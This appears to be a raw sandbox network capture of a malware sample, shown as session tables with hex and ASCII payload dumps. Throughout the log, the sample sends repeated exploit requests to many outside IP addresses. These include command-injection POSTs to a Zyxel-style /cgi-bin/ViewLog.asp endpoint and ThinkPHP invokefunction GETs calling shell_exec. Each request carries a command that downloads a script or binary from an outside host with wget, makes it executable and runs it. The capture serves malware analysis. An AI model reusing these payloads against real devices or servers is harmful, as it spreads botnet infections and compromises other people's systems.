                                                      Feb 14, 2024 09:30:33.705473900 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.901966095 CET134INHTTP/1.1 403 Forbidden
                                                      Content-Type: application/json;charset=utf-8
                                                      Content-Length: 0
                                                      Server: Jetty(9.1.z-SNAPSHOT)


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      731192.168.2.153699231.136.63.1908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.711038113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.328566074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:35.576313972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.232228041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.352264881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.335695028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.071417093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:55.030227900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      732192.168.2.154146231.136.180.928080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.711901903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.328550100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:35.576309919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.232141018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.352138042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.335678101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.071338892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:55.030092001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      733192.168.2.154370031.136.124.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.730652094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.424436092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:35.768475056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.488281012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.864187002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:54.615719080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119205952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:59.126137018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      734192.168.2.153343094.253.117.58080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.747340918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.985714912 CET324INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.14.0
                                                      Date: Wed, 14 Feb 2024 08:30:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 169
                                                      Connection: keep-alive
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      735192.168.2.155960031.200.42.1808080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.756351948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      736192.168.2.155182062.29.126.1108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.757536888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      737192.168.2.155590294.121.122.2448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.759243011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      738192.168.2.153488495.169.26.22680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.911087036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:34.059140921 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      739192.168.2.153811895.216.175.5980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.984535933 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
